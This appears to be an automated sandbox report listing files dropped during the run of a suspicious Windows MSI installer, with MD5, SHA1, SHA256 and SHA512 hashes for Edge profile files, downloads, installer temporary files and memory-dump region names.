SHA512 a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

\??\pipe\LOCAL\crashpad_4940_MREFXYTZMBVUSXLI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 53bc70ecb115bdbabe67620c416fe9b3
SHA1 af66ec51a13a59639eaf54d62ff3b4f092bb2fc1
SHA256 b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771
SHA512 cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 12564c446325a17c9f4d195cb176146e
SHA1 dcb643a616aa12724b29a910b0dbc7a937b9333a
SHA256 5d621cf18d99d487dc1fbd7ee9b91da3fc1151153036000afbed89eb0205b14f
SHA512 1f3ef727bcd1e9075d97d0a17a3b051482e31de206b2f333d0d99659dda7bf6d854c1711976adc1c3ad6b6ef71ea9c303031e3dd06f7a3c2c87fe1b08326f39e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 65fe18d2fb0f29aed1fa33ae94a7c137
SHA1 fa02beeab5c606a16148fe400d986ad4f2c45312
SHA256 cb08b6e6c82aab638d6c9179c53d2db3d86e540f2600929156c690d621b67f02
SHA512 b0ad87accf6541afe4bd8d0b30afa455d57226be10a459bf1c9fa21403d92c741121fa5fe84e02e1b547c9af7c3ead977b8d4f3e957efafc4a6c6d06dde30e21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fea4d80d887f65267e138bd329086480
SHA1 7f0d2c3e9a2264b69b687ed6f5b717af80e729a7
SHA256 85a647fe95e237b57686bc52ae68c8eb0e2b6bdb598e90e7599b24e32d72a0f3
SHA512 eb34a76258e64e0526f64000275cda4198c9717171aa31ae407da7efde08deea51aa4e5b16d703888bfae93d09f4a3107d3f90e1f880727026028c4543c9cb02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 28467265c36412e538c9fbb5bdb55b44
SHA1 d03cdf4e9681a3b81ea3324f134ee97e16c131c8
SHA256 243911398caf8cb6193ed615101e3ea19135019840a0a81c9da137a12488742f
SHA512 57b3adbeb3c3c1e14b0f66ca43208e7fc4591dcfa20402c74f87f5d06a43bf6c5b75f7ad583a831646397efe5fa5e5df144a83f2b41a8275a1b24e073a6e05f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 807419ca9a4734feaf8d8563a003b048
SHA1 a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256 aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512 f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582e00.TMP

MD5 1449bd155fbc00314180af8c1fcda2c9
SHA1 d57eef0502a0b0906402cf94fdb24d54339d9ee7
SHA256 9e4a8c7c05cf50cdbff95083f083c90c84e4f0a934e7660e0dec613e912ca1d5
SHA512 0cce5db91098ca8c05efd3ec1224873f4ddb057902c8d06027ea6670216214b1deb1c608b8dd3f09ae716842cb44bbd9173b0832780b516a4b32c539d5020732

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a124391e0de24a3337c1f9b11e15de82
SHA1 cb0773eb56f8697335c57881fd3ce85e804117bc
SHA256 a764596d68c63a3c7ca266ed0d437a18fe2818436da0428ead9ff165e024a360
SHA512 dba3184eabe6d1b79bb8af96119904c2c2179ddeb3659f212914b93639b1e0a598a01892ff8d514db19147c3308c1e45dc1d40f5b87e2fa8e4018db457bbf9f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 e1316d4a78e5f6999a7695568287570e
SHA1 2103aa970b6adcd93700017491efde75960cee37
SHA256 8fc1f56befb0e1655ac31106c89745813cf6c5d1686b0c0463d93632ac8fdb9f
SHA512 4626636732734b8720f7813ac4cf444f64ef1f48af69256650c46ec975cc50ad76f831c71aaf0afb0f198deb3964345433bea09f15e66fc76ca96420325df2d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe583b3f.TMP

MD5 c2a8ab32f73b8ee18e59113f6b2df4a9
SHA1 24445755114f2e44a6b74dc216ba9b1655dbba33
SHA256 b0cd0dbcf48e5d9df941c9cd0e6956847ce857a3f42cf072c3fe535556aaf53b
SHA512 ce8b0e5a3957f2e693f31d343932abdfc7c4100ea5dc503ec6bb700727f56c22a6c4c368ff11efb72bc1e66676400e079f42ad8cfa3ae9526056c595de6e5eea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e7b316e5fdc47f33876245d8e232dc2d
SHA1 bcd0604245d36f6937fd390e6d6a7f5f89a588f6
SHA256 aee704b19d918d5a01adc00f0e283a6cc0691d52384b904bc64155068b0aa0c1
SHA512 a855702450ecf22470c87c561f3360a9849d04c842c4e79eb3f3adc479737dd4f37ee7eaca549bb42bf366b8b8309e111c994003c142737ff3315466d84a577c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032

MD5 950eca48e414acbe2c3b5d046dcb8521
SHA1 1731f264e979f18cdf08c405c7b7d32789a6fb59
SHA256 c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2
SHA512 27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 cb73c10ea36813d5094b99cd9f74588a
SHA1 d3ef83631a2a14939f1998ac202f1453524c1c02
SHA256 cb38ffa2befbaf646c184a0aa9937a38b0a6efe4cf3b228958051d34d01dd7e1
SHA512 262fcb7772b2b4e3bfe5e36570517c9ff4d79c18693f32d4623e83a21dc3c2dd120708c56b5009eea1cb25472876d705199d590b01567ce289d1561be752ebb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d2724410b5851199c545771e92e7b1d6
SHA1 0aafc177434f0808408a6c94efa322c18bc12b27
SHA256 020064884216b312cd218d9012fbf040c558f71509e00aca9b7a5e210f4c2379
SHA512 bcb0ae046ad8ca2300d359a9a27316e24573708687536339e06937645319d838de93312aeb5a050cb88fc11f4f8090ca713f1552e50ad52a0fcc4671e395dba5

C:\Users\Public\Desktop\Acrobat Reader DC.lnk

MD5 1b99e9c0b18a8ff11628c78ae7ec8b22
SHA1 1c7498935760542ffb55042b1107b187366ab867
SHA256 16a6a0ee84ea6ec319455a8cbdc0a07d9cc6611e82990f9409693540e33e4cb2
SHA512 4971dc65ef122cfe0f2f692bc9e51a1155528b54de464a70803166e55e3c36901615e8d56a73a7628f5ad2e805c0f352a93ff6a8bbd86ff4a9f06573a8f994c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 50f92b2a8e7df355d21571215f06adab
SHA1 d600210ba968c31d0c9c92fd0cc2b35bf2809a23
SHA256 dd60f17b87070762bdd158f028ae4ec7cfb6acf2d71542877c7d56eb4427d5c9
SHA512 356e1117cde07f6939b258814de44d93f89eb33667a5d0dd55ccba7e4821acc1567b4166e82550284b9e58f3ce37584fbe05c7b89776d7bdaee2ac57a67a8781

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

MD5 76a3f1e9a452564e0f8dce6c0ee111e8
SHA1 11c3d925cbc1a52d53584fd8606f8f713aa59114
SHA256 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c
SHA512 a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 5b6eb9202abfde97e3d691a835509902
SHA1 515f8ea6e88d5bde68808f1d14e3571bc04d94e7
SHA256 f9ab282aea02569f9e73aba576cd517a7fefba7d90b935fc571397e710b15dab
SHA512 309f32e918aefdb51c218d57ac37714d90653dbcc4317597c1e3df67a8375b5cd7aed9dec97eeae248b29c03bb46318216a3384971357bfb4dfbc294e7f5f9e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

MD5 1d9097f6fd8365c7ed19f621246587eb
SHA1 937676f80fd908adc63adb3deb7d0bf4b64ad30e
SHA256 a9dc0d556e1592de2aeef8eed47d099481cfb7f37ea3bf1736df764704f39ddf
SHA512 251bf8a2baf71cde89873b26ee77fe89586daf2a2a913bd8383b1b4eca391fdd28aea6396de3fdff029c6d188bf9bb5f169954e5445da2933664e70acd79f4e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

MD5 c3c0eb5e044497577bec91b5970f6d30
SHA1 d833f81cf21f68d43ba64a6c28892945adc317a6
SHA256 eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb
SHA512 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 b38fbbd0b5c8e8b4452b33d6f85df7dc
SHA1 386ba241790252df01a6a028b3238de2f995a559
SHA256 b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd
SHA512 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 710d7637cc7e21b62fd3efe6aba1fd27
SHA1 8645d6b137064c7b38e10c736724e17787db6cf3
SHA256 c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b
SHA512 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

MD5 74c0a9aceda2547c4b5554c0425b17ba
SHA1 d5d2355e5919dcf704192787f4b2fbb63b649b0f
SHA256 3b9e3adb939801b9ada1ce67afc7decef4538c016c78113697b89a35a295dd8d
SHA512 e178dce4a59cf184bcca3523e687092f4edc2a3c7af4eddf1ca1965ca06347eadf8901f851260264c14fa052331b2d1aeef2a6b9048b87758617285c9650b479

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8588b1756e9edd053db586bfd4ef5f42
SHA1 eec481b51315700e39540eb1395b837610b10d7e
SHA256 801e7fb92bcc9e3b745d53981b72efdcd3665ae36090bbc98de6f4ff14779e0c
SHA512 266afe4e2a65e501f278c5154125d2a583cece11075eea0fd049593a1dabb8efa12157450b121d4c91afcc983ce5891016a899490b041e1936c36896888732ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 246d8d0fa2fe4d1a7e916d75cad43216
SHA1 37bb4f08e43a9fd0238fc630f80b223c6626ebe7
SHA256 774209a1511fd333f91e885b23039d7fc4615bbf280bd60bd561a6a07f482728
SHA512 6879e8028b0b7152e6d99a4282bae34fe854bf70ba3d84d33d2bdaab8c257284c35d96cb43d2b41e170fbf2f7d78443086017933e8e714cfd3147dd7b9f2b2e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 bc104f08c6446118a42e26fb19816c50
SHA1 071c5a005d2b10fee347b2a3c9ffccfabcd2f79d
SHA256 11a685f805d68babf9030cba5af2accd6cf9f80ed60ea0823e500669b6fdf917
SHA512 18b97b7e43d99cf96a5e51da1f560f3e912caaf3d6313dbcc1710bd09f16f1544ce6bff062b994fce06cfc0ea02c1c2fcc61518834688ff5f8b3fbc280bca500

C:\Users\Admin\Downloads\758f6fa8-6e15-4971-81fa-b3a021965bab.tmp

MD5 e233dd91baf27f08921bd3530d12414e
SHA1 900e1e4ab2fa769f6b8991338796d58110f1b89c
SHA256 a35661e2cd35cd20cc6aaecb884d702c815ab6ad28311b7608c31cea5ac0b983
SHA512 f4e1641a3a8d19645b9be686765218a1681e1ad75506a3797ddbfae4b9858e3944ba402db480c2cf7bdf68884c13cc8711a497aeafaa57df614ae1e0d6ccc530

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\979caeb6-6fd6-4abb-a45f-6a489dab9da2.tmp

MD5 886794a3e73ffd9f54258ba530dcaf67
SHA1 f8e0d2dceb4191be93f19f95e17e07e554f60c66
SHA256 c3ca1f3d8248065e69ea9257db74b2e846d173307a202827e5852b91cb01bc0f
SHA512 8ba0c6e2e336ac67dab71e8a7c6189c1eef568ee07a10f057ec6d20ab7f29f5ccff056c2334a188ac52657d1bf903d628653cb84304ba9204fa6a1f262e9ad58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036

MD5 d91bac1b60b58c54f87f1d1b7b16d445
SHA1 9ed78d3cf7553e3180bcbcd2ea9779e1e1a141e1
SHA256 4dd5f57067798bd3132643930620ccde1e4140289d52fcbc4fcf7b252876fe8f
SHA512 eb474a57cce34e17d00972b927846f087c55a76f5fc1fdbea0e43111f9d9a5af848862984431402a6a043e5a1a96815be84e114fc03c0372a03285fcf0c2623c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035

MD5 5d0e354e98734f75eee79829eb7b9039
SHA1 86ffc126d8b7473568a4bb04d49021959a892b3a
SHA256 1cf8ae1c13406a2b4fc81dae6e30f6ea6a8a72566222d2ffe9e85b7e3676b97e
SHA512 4475f576a2cdaac1ebdec9e0a94f3098e2bc84b9a2a1da004c67e73597dd61acfbb88c94d0d39a655732c77565b7cc06880c78a97307cb3aac5abf16dd14ec79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000037

MD5 5ee74d2f4e6ea0f4d1f7400ff14d8ed3
SHA1 9951232bfd4bf98399ba2d2afa462e8330abeb85
SHA256 a71683af7a6c0920259ae7bba878f706f350ee6621b2e93c5cfee7cdd0c6ab49
SHA512 7fe33c2da8658acfecd676cf1501d745802556638bad6b5eafc279f9cfd2a27b3b0abd9e3911c36365baf5f842c6194c0fd31f0d4ce3950e8aa92c42abb529e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1727f6121993ac8257f963ee2800e12a
SHA1 a1b40bd1d1b2c699d2ce108c0d8e15936ea70a40
SHA256 5fb8b246f2120acea0af300d1cefcf7e01a843c1ca9c743f7099d5dabfe8b7f2
SHA512 ce12598eb37cdd91579d31dd0aa98b08c4bee9a894d2218b46c29506dca07229f503f810a078decd75405c9ca5160e36aba7fda44c4854572f57ec396e02d1a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054

MD5 fa0e80178ceb7aedb057c26747d13bb0
SHA1 0adcfada05cdcf56dda3960d251920f62eb9a0d2
SHA256 dd11477a42da0195ccee960fe845fc8a1673967dbeae8d3827b6073ea2fd5554
SHA512 1cae8f364b2e8b44ab2ba872474dcee570e4d251591cd1ad5286aed89b57ef8ed6bdf57f510df3e5e8763d9ea08dd11b8602565b47e1ce3587a452c156be8ecb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 b89c4cdbc30883df3ce0ef3535fe84b9
SHA1 1a9572c8ab85063a2a324b5a8a3e701a628476f6
SHA256 d0a9119d4c8cad728847a95d9e73756edcf4e332bebda9e5ad0c1d92c10c1fdd
SHA512 215e5aea3e1d03c357d709dbea34e5f777d9393c3f20f7d4ddeb9bd49925b9be2c018ec9567f0efe975557ec580a17c69f5e26c4f779cddeae6e07ca7d9ca397

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000014

MD5 aab2532f8363e63359dbf0c31981f57f
SHA1 a21523eb85636a0455977ffe525260a1a8568043
SHA256 a6abef5f074c67b1f9fbee679151a4c705b71f054c98f720dfabdc65786d5d13
SHA512 7b3c4ce6574b36bf0d4e05bba1063798b525744fdb37b28ad6fc78456ef7d704677795ae4dd0d0eda0954d15b3776395fa931abf82dd4b64583c360dd9916f64

C:\Users\Admin\Downloads\6c3806eb-ad96-459d-b5e6-ef23d270fa6c.tmp

MD5 e9818905f852140640a32d0eacbe8c68
SHA1 7560e97420e5be4c462b6154c5e1151bf692994e
SHA256 69ff2ce6bb13f20009899ca93a12cba436d58cbf98e5e01a76def4e584fb68c7
SHA512 46acbefd0de231c7996c0294c1e473921fcbba99c41c4daeadd4bd881558d050a230c113f2be2e0840c83f422a49fd42b33a915bcf98ae39d070d0d7a3c106ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b028b5ef8bdfda4253133b5f5210028c
SHA1 e22d53241f8e7566e479a271e6d3f6ab3819a867
SHA256 488b76ef0c08f6f58b270e98e4eb094072c04747e447aea505df84a80b8a0a06
SHA512 ccac42c0f9463a70ad706abb229591b47c841c394573825a73262f7342c43b5184ce597c1513e6cdcfa43f96452deb349a71412e0da6329e6f81add964b5407e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cc58a359cd6d2c6bab80f4f8e24569b1
SHA1 4f3f866592427ac81aa77260432799ce206cb7c4
SHA256 f2a6a7f5fe956820b21ce1b68e6af5d3ed5dd4f8f4a168a2162b873fd61464d3
SHA512 7aa2bd2679aad0addf414b1bf7bd4fde143661fb555e45e2ee1ad23b7c592e9008bb9f20347793968ac87e099d1e615019ff18b49bbccdcdcebc19b600939a6c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3b470252f728fcede25eeff04becdb8e
SHA1 00353db03fbc3a04bd1a3709e90d6690c5e556a8
SHA256 206983ad4222c0e836244bdc575bcaaeee5b743ec0357a6493a924af6a43ff6c
SHA512 eaeb65e3913932fe1d77508ae37da361f952cab6f244a3310159cd437bf80c10ccd14bd55ff45391af26be2c6d70c2cffd434e3ae8623d74802512913d21a87b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8cc06f38353754b5d009f8806323c58b
SHA1 69b1f759873c12e5e7ca7076b8cfe771fea17b4d
SHA256 aa69d997ae6d94abbb3e499423c386fc779665455b51c1cbf6e934c1cec1d8b0
SHA512 f9205d00c44c227032147e776fa7884dee0c06490f92bac3742f31b8cb10e2a952a6919a41a236838b78fc57ee740399fd9428a41610b63c5c5dd074067751dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2d37ce805f46cfd93b1e95587b736e8e
SHA1 0e0f349c2f32d79a854234d1c77158578de5fde6
SHA256 06ddd7f03ac46d38890170f3f520d0e08c94541ee773e90a7676882c29a62555
SHA512 097c5be76605a6b5db026f0f19211ede05ca21f1d1f3866390e63ec9fa08c303e3edbbd6a39236c19ad9fb1880abe8b31946ba94c0277b5db017741fbf24bb1c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 69dc60e68f498391da72688df63212eb
SHA1 1cb9e995a09fc7a61c6e46f038bda25a73c22db0
SHA256 25b7192fe5f7a5cf0cf41259e18eea652babd2c5467c3059969f3550b999987c
SHA512 4fa307d128878cd7fdfa4f7f44937d24eef7ade3c7f8422f0628f31d73f6ad8ec1beafc30ef850a07f2bbd1114bf643f5bfe8f221bb3d94cbe52d2fd7a151a96

memory/4928-1332-0x0000022BB3460000-0x0000022BB3470000-memory.dmp

memory/4928-1328-0x0000022BB2BB0000-0x0000022BB2BC0000-memory.dmp

memory/4928-1339-0x0000022BBB740000-0x0000022BBB741000-memory.dmp

memory/4928-1341-0x0000022BBB7C0000-0x0000022BBB7C1000-memory.dmp

memory/4928-1345-0x0000022BBB850000-0x0000022BBB851000-memory.dmp

memory/4928-1344-0x0000022BBB850000-0x0000022BBB851000-memory.dmp

memory/4928-1343-0x0000022BBB7C0000-0x0000022BBB7C1000-memory.dmp

memory/4928-1346-0x0000022BBB860000-0x0000022BBB861000-memory.dmp

memory/4928-1347-0x0000022BBB860000-0x0000022BBB861000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7ebf9ee18fce3b87b760bd2b568b6db7
SHA1 1e0473076dfcbc461ae462ac3997dd899cdd2086
SHA256 6356cb4c030656505734e0394a3794efa1122d27f05dc05b46452516925847f3
SHA512 180a4f1308345d0800f239b40657432e48dc749093c97a42d8361447fdeaf68f8da7b2c769c28d11be41606d12b3c64f43a85a9a385615c785b728c97db9bb77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1a56bce41a92f8d2ce27a6004b1f4384
SHA1 e4acc785b4b96a1ba03a7039386acf4539844970
SHA256 03c59fc642319e6bebe3c32821f20a46f1af7856e93be7d3a01a01c3745e945d
SHA512 464279563d26e59e581056b805a83689b607abc5030babba84ba91c1744fff720019cad266ec6e09174bac2fefc1fe8551435b2b186c4d959e4ab400a0417f93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7a3881718d72f4d49d519c98a68d602c
SHA1 fcc5062a5d68caafd334996bacfa5e3f4a8cf15f
SHA256 d3202a561f4a512fa6714e571384791380276fcc055a6b30bbe4510014033310
SHA512 8328da1099e0e3056ffe9d8e306816540775bab6ceb13450b634fc3dcfe1b3035492c4110a1866e922930dc20b302833606962c4427faec2c4353ede638684db

C:\Users\Admin\Downloads\_x64__x32__installer__.zip

MD5 2688578be19130e4f567c7ab0588904a
SHA1 8ea760acac456d51ba85543a2e9017f4a565ff6c
SHA256 94c7cf630ea81de4dbb4db3b031b96a90afc2ae1f3da6d329910e4fc1a51629c
SHA512 30a8b528f13d85520d14ae14af9cebd82c1ce019d755cfc47da33a7d6db7b4f8ac1a6fc1feae1fcaa80f28d291c21ef372015dfdb94d45023d10d9d43ba615a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 09a62c0fed48d174a545656ad1f9d002
SHA1 9a62cca4387441bbc9be2eea5f320f3e9ddf5b83
SHA256 00d1cd489abdf13bd64df25d58b12ea9a23be8951098ad66a181fe372ea6f24d
SHA512 997479069ed8d0bd3414aef3ab2e41da263ce1be4bb5ad530c9f28dcebb95ed76d737465126c45dbfb94152538ab25febe0d3d2da267ec268ab409ad0a960713

C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi

MD5 acf3049f9a32d9c2d30d0546e7a4249a
SHA1 491fbaf36bbb029601daf0e73ff17179f6f8ebd9
SHA256 4e5def247c481ea835d423ca3134dc1192dc688693676ac6730c5e60ab269f61
SHA512 02a40cd23470dff49afb6dcb80e7313b78aeb5bcd50ff564a7756aa01589379cae04953d6f50d0f22d6a251696a52702cdfde4f8daa7829b1e74d019fa66b900

C:\Windows\Installer\MSIED6E.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Config.Msi\e5aea64.rbs

MD5 200bb076ce43cf8778ed59fb99b49c30
SHA1 d9e12d0dea83513454436f5f8d6f4340f156f320
SHA256 8ae78afa8d7604faeb0ae0aa9fe46096c5aa999d6cbf4f8f844335aa9095ccce
SHA512 fd173505d0ae364b9d9683207a93f2d6a6147580ef646589fb018d30ba467b257847e3a3e9ea609e7272ca9f7cc9a5a8b576d06addf8b263324d8eff37653821

memory/5140-1586-0x00000288D22B0000-0x00000288D22D6000-memory.dmp

memory/5220-1587-0x0000000000660000-0x0000000000689000-memory.dmp

memory/5220-1588-0x0000000000660000-0x0000000000689000-memory.dmp

C:\Config.Msi\e5aea68.rbs

MD5 ad4f1fa15aec06cbf614154349a95023
SHA1 9d3255f6052f1aacb458fc2aa502a599b16e11fd
SHA256 1321c1e6ae53352e23774b8ba7241f28297fc1e9f30fcd081ef0742630fcd965
SHA512 d321bc33477105f620b017a99261ce643167db3f715a10b4d6c1ea809998a8317b42c514b0b916a88a686a5297fd62f2fec05fe0b7334d5f38d976d83391b276

memory/5220-1608-0x0000000000660000-0x0000000000689000-memory.dmp

memory/5488-1611-0x000001B1A29E0000-0x000001B1A2A62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yd5fxyio.zj1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5488-1617-0x000001B1A2800000-0x000001B1A2822000-memory.dmp

memory/5488-1622-0x000001B1A27D0000-0x000001B1A27E0000-memory.dmp

memory/5488-1623-0x000001B1A2C80000-0x000001B1A2D82000-memory.dmp

memory/5220-1624-0x0000000000660000-0x0000000000689000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/5488-1659-0x000001B1A2990000-0x000001B1A29AC000-memory.dmp

memory/5488-1660-0x000001B1A2960000-0x000001B1A2968000-memory.dmp

memory/5488-1661-0x000001B1A2BB0000-0x000001B1A2BCE000-memory.dmp

memory/5488-1696-0x000001B1A32D0000-0x000001B1A3492000-memory.dmp

memory/5488-1700-0x000001B1A39D0000-0x000001B1A3EF8000-memory.dmp

memory/5488-1708-0x000001B1A2C30000-0x000001B1A2C70000-memory.dmp

memory/5220-1711-0x0000000000660000-0x0000000000689000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c9c5d1bdab3fae5ac2a334cab7abb155
SHA1 4c110ed431b4bf0ca4ef6324ab2fefc78c917b91
SHA256 82bc39a976dfc39f9ed6af238c23f231d491a506b5423e0c803de6d1d2036f13
SHA512 c50587d93b4701eb84809f7d0e5711c8026bd7e7d3abf71d9097972925ba9c96fa564005a7b7b25c5003bcf4697bfe588f1d842ee9b2dd213f1351d07e7dbf0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f35c8aa47023d2ef22bbeb114a7a7eb
SHA1 5a173a4854e3beae6a57b50d2840ac75dae04b75
